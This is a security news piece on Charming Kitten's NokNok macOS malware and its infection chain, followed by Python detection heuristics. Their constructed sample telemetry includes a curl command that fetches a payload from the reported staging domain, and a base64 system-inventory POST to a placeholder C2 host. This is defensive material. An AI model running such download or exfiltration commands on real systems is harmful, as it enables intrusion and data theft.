Charming Kitten has introduced the new NokNok malware in the wild, primarily targeting macOS systems. Based on reports, the campaign started last May and utilised an infection method different from the group's earlier operations.
The group has transitioned from macro-based attacks using Word documents to LNK files that run their payloads. Moreover, the hackers pose as US nuclear experts and approach their targets with thought-provoking propositions, baiting them into reviewing draft papers on foreign policy concerns.
The Charming Kitten group sent a different link to infect macOS users with the NokNok malware.
The Charming Kitten group’s attack strategy against Windows users is to gain trust and then send a malicious link carrying a Google Script macro. However, if the target is a macOS user, they send a different link to deploy the NokNok malware.
Researchers noted that the attackers use a link that redirects victims to library-store[.]camdvr[.]org, which hosts a ZIP file disguised as a RUSI VPN application.
Next, executing the AppleScript file found within the archive triggers a curl command that fetches the NokNok payload and establishes a backdoor into the victim’s macOS system.
The NokNok malware then generates a unique system identifier and uses a set of four bash script modules to achieve its objectives. The confirmed goals include establishing persistence, communicating with the command-and-control server, and exfiltrating information to the attacker-controlled server.
In addition, the malware gathers system information, such as running processes, installed apps, and the operating system version, as part of its operations. Furthermore, NokNok applies various encryption tactics and base64-encodes the data before exfiltrating the harvested information, to keep it confidential in transit.
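The infection chain and post-infection behaviour just described translate into two detection opportunities on a macOS endpoint: a script interpreter (the chain starts with an AppleScript file) spawning a command-line downloader, and outbound POST bodies that are nothing but base64 and decode to a system inventory. The following Python is an added example written for this article; it is not code from the article, from the attackers, or from any vendor report. The event format (pid/ppid/exe/cmd for process events, pid/method/host/body for HTTP events), the sample file paths and the hosts other than the staging domain named in the article are all constructed for the demonstration.

```python
"""Detection heuristics for the macOS infection chain described above.

Added example, not code from the article or any vendor report. The event
dictionaries below are CONSTRUCTED sample data in an assumed, simplified
format (pid/ppid/exe/cmd for process events; pid/method/host/body for HTTP
events); real telemetry (Endpoint Security or EDR exports) would need a
small adapter. File paths and non-article hosts in the samples are invented.
"""
import base64
import binascii
import re

# Staging domain reported in the article (defanged there as
# library-store[.]camdvr[.]org). Used only as a detection indicator.
STAGING_DOMAIN = "library-store.camdvr.org"

# Rule 1: a script interpreter launching a command-line downloader.
SCRIPT_INTERPRETERS = {"osascript", "bash", "sh", "zsh"}
DOWNLOADERS = {"curl", "wget"}

# Rule 2: markers suggesting a base64-decoded POST body carries a system
# inventory (OS version, process list, installed apps), which the article
# says NokNok collects and base64-encodes before exfiltration.
INVENTORY_MARKERS = ("ProductVersion", "sw_vers", "ps aux",
                     "/Applications/", "system_profiler")


def basename(path: str) -> str:
    """Last path component, e.g. '/usr/bin/curl' -> 'curl'."""
    return path.rsplit("/", 1)[-1]


def flag_process_chains(events):
    """Return [(child_pid, reason)] for every interpreter -> downloader pair."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue
        if basename(e["exe"]) in DOWNLOADERS and basename(parent["exe"]) in SCRIPT_INTERPRETERS:
            reason = (f"{basename(parent['exe'])} (pid {parent['pid']}) spawned "
                      f"{basename(e['exe'])}: {e['cmd']}")
            if STAGING_DOMAIN in e["cmd"]:
                reason += " [known staging domain]"
            findings.append((e["pid"], reason))
    return findings


def decode_base64_body(body: str):
    """Decode a body that consists entirely of base64 text; None otherwise."""
    compact = re.sub(r"\s+", "", body)
    if not compact or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", compact):
        return None
    try:
        return base64.b64decode(compact, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def flag_exfil_bodies(http_events):
    """Return [(pid, host, matched_markers)] for POSTs whose base64 payload
    decodes to text containing system-inventory markers."""
    findings = []
    for h in http_events:
        if h["method"] != "POST":
            continue
        text = decode_base64_body(h["body"])
        if text is None:
            continue
        hits = [m for m in INVENTORY_MARKERS if m in text]
        if hits:
            findings.append((h["pid"], h["host"], hits))
    return findings


# --- Constructed sample telemetry (all paths and hosts invented) ------------
SAMPLE_PROCESS_EVENTS = [
    {"pid": 700, "ppid": 1, "exe": "/usr/bin/osascript",
     "cmd": "osascript /Users/jane/Downloads/RUSI-VPN/launcher.scpt"},
    {"pid": 701, "ppid": 700, "exe": "/usr/bin/curl",   # script -> curl
     "cmd": "curl -s -o /Users/jane/Library/.cache/upd "
            "http://library-store.camdvr.org/sample-path.zip"},  # URL path invented
    {"pid": 702, "ppid": 1, "exe": "/usr/bin/curl",     # benign: launchd parent
     "cmd": "curl -s https://updates.example.com/manifest.json"},
    {"pid": 703, "ppid": 700, "exe": "/bin/ls", "cmd": "ls -la"},
]

SAMPLE_HTTP_EVENTS = [
    {"pid": 710, "method": "POST", "host": "c2.example.invalid",
     "body": base64.b64encode(
         b"ProductVersion:\t13.4\nps aux | head -5\n/Applications/Safari.app\n").decode()},
    {"pid": 711, "method": "POST", "host": "api.example.invalid",
     "body": base64.b64encode(b'{"event": "heartbeat"}').decode()},
    {"pid": 712, "method": "GET", "host": "www.example.com", "body": ""},
]

if __name__ == "__main__":
    for pid, why in flag_process_chains(SAMPLE_PROCESS_EVENTS):
        print(f"[process] pid {pid}: {why}")
    for pid, host, hits in flag_exfil_bodies(SAMPLE_HTTP_EVENTS):
        print(f"[network] pid {pid} -> {host}: decoded body mentions {hits}")
```

Run as a script, the sample data produces one process finding (the osascript-spawned curl reaching the staging domain; the launchd-spawned curl is left alone) and one network finding (the POST whose base64 body decodes to OS version, process list and application paths; the base64 heartbeat decodes cleanly but matches no marker). The base64 rule is deliberately narrow, requiring the whole body to be base64 and to decode to UTF-8 text, because base64 alone is common in legitimate traffic; the inventory markers are what make it worth an alert, and the article's note that NokNok also encrypts means an encrypted-then-encoded body will not match this rule and must be caught by the process-lineage rule or by destination reputation instead.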
The Charming Kitten group has continued to evolve its infection methods to hinder detection and conduct cyberespionage operations against its targets. This campaign shows the attackers' adaptability, since they have developed the ability to target macOS systems.
Lastly, the emergence of NokNok highlights the constant upgrading of sophisticated malware to target multiple operating systems.